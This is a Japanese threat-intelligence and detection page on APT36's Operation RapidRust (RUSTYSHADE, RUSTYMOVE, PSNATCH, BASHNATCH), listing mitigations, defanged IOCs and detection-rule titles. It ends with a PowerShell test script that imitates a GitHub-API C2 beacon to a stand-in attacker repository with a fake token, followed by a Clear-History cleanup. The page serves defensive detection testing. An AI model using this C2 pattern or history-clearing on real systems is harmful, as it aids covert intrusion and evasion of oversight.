APT36 が RUSTYSHADE と RUSTYMOVE を使用した Operation RapidRust を開始
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
パキスタン系の脅威アクターAPT36が、政府および防衛組織に対するOperation RapidRustと呼ばれるキャンペーンを実施しています。このグループは、RUSTYSHADEバックドアやRUSTYMOVEプロパゲーションツールを含む新しいRustベースのマルウェアを導入しました。APT36はまた、特化したファイル窃取スクリプトであるPSNATCHとBASHNATCHを使用し、データをプライベートGithubリポジトリを通じて収集および流出させています。
調査
Zscaler ThreatLabzは、2026年8月にAPT36による新しいマルウェアファミリーと攻撃後ツールを特定しました。調査により、GitHub REST APIを悪用したコマンド・アンド・コントロールとペイロードの段階でタイポスクワットのドメインが明らかになりました。また、研究者たちは横方向移動の試みやRUSTYMOVEがエアギャップ環境を目指す取り外し可能なメディア経由の拡散を観察しました。
緩和策
組織は、無許可のGitHub API使用やBackblazeなどのクラウドストレージサービスへの異常なアウトバウンド接続を監視すべきです。取り外し可能なメディアに対しては厳格な制御を施し、合法的なアップデートを装った不審なスケジュールタスクを検出すべきです。エンドポイントの監視では、無許可のPowerShellまたはBashスクリプトの実行や異常なファイル流出活動を確認する必要があります。
対応策
悪意のある活動が検出された場合、影響を受けたWindowsおよびLinuxのエンドポイントは、横方向の移動やデータ流出を防ぐために直ちに隔離すべきです。対応者はスケジュールされたタスクを調査し、以下のようなファイルを検索すべきです。 DriverInstaller.zip or Automata-20.exe。 ネットワークログも、以下への接続や theprints[.]org, indiatodays[.]org、そして環境からの不審なGitHub API活動を確認するためにレビューされるべきです。
攻撃フロー
この部分はまだ更新中です。
検出
隠れたPowerShellコマンドラインによる実行の可能性 (via cmdline)
PowerShell経由のダウンロードまたはアップロード (via cmdline)
リモートシステムの発見または接続性チェックの可能性 (via cmdline)
ネットワーク共有の発見の可能性 (via cmdline)
管理者アカウントやグループの列挙の可能性 (via cmdline)
システムネットワーク構成の発見の可能性 (via cmdline)
公共のユーザープロファイルからの不審な実行 (via process_creation)
スケジュールされたタスクの作成の可能性 (via powershell)
IPルックアップドメイン通信の試行の可能性 (via dns)
検出対象IOCs(HashSha256):Operation RapidRust:APT36によるRUSTYSHADE、RUSTYMOVE、PSNATCH、およびBASHNATCHの展開
検出対象IOCs(HashSha1):Operation RapidRust:APT36によるRUSTYSHADE、RUSTYMOVE、PSNATCH、およびBASHNATCHの展開
検出対象IOCs(HashMd5):Operation RapidRust:APT36によるRUSTYSHADE、RUSTYMOVE、PSNATCH、およびBASHNATCHの展開
RUSTYSHADE C2通信のGitHub API経由の検出 [Windowsネットワーク接続]
RUSTYSHADEおよびRUSTYMOVEの活動検出のPowerShell経由 [Windows Powershell]
シミュレーション実行
-
攻撃のナラティブとコマンド: 攻撃者は、Windows作業機にRUSTYSHADEに似たインプラントを展開することに成功しました。さらなる指示を受けるために、インプラントはGitHubにホストされたC2と通信する必要があります。インプラントは、ペイロードを取得するために特定のリポジトリに到達しようとします。匿名のAPIアクセスをブロックする基本的な境界フィルターを回避するため、インプラントは以下の
Authorization: token <TOKEN>ヘッダーを通してハードコードされた個人アクセストークン(PAT)を使用します。この行動は、リポジトリメタデータを取得する合法的な開発ツールのように見せかけることを意図していますが、リポジトリURLとトークンのヘッダ内のプレフィックスの特定の組み合わせは、検出ルールをトリガーします。 -
リグレッションテストスクリプト:
# RUSTYSHADE C2通信を模倣するシミュレーションスクリプト # このスクリプトは、以下の検出ロジックに一致するリクエストを生成します: # 1. URLに 'api.github.com/repos/' を含む # 2. ヘッダに 'Authorization: token' を含む $targetUrl = "https://api.github.com/repos/adversary-c2/malicious-repo/contents/config.json" $fakeToken = "ghp_sImUlAtEdToKeN1234567890AbCdEfGhIjKlMnOpQrStUvWxYz" # 規則が要求する正確な 'token' 文字列に一致するようにヘッダーを構築 $headers = @{ "Authorization" = "token $fakeToken" "User-Agent" = "RUSTYSHADE-Implant/1.0" } Write-Host "C2通信を $targetUrl に試行中..." try { # URLが偽物で404を返すので -ErrorAction SilentlyContinue を使いますが、 # プロキシはリクエスト試行をログとして残します。 Invoke-WebRequest -Uri $targetUrl -Headers $headers -Method Get -ErrorAction SilentlyContinue Write-Host "シミュレーションリクエスト送信に成功しました。" } catch { Write-Host "リクエスト送信済み (偽のURLによる予期されたエラー、しかしプロキシのログは試行を記録すべきです)。" } -
クリーンアップコマンド:
# システムに永続的な変更は加えられていません; # しかし、コマンド履歴をクリアしてクリーンに保ちます。 Clear-History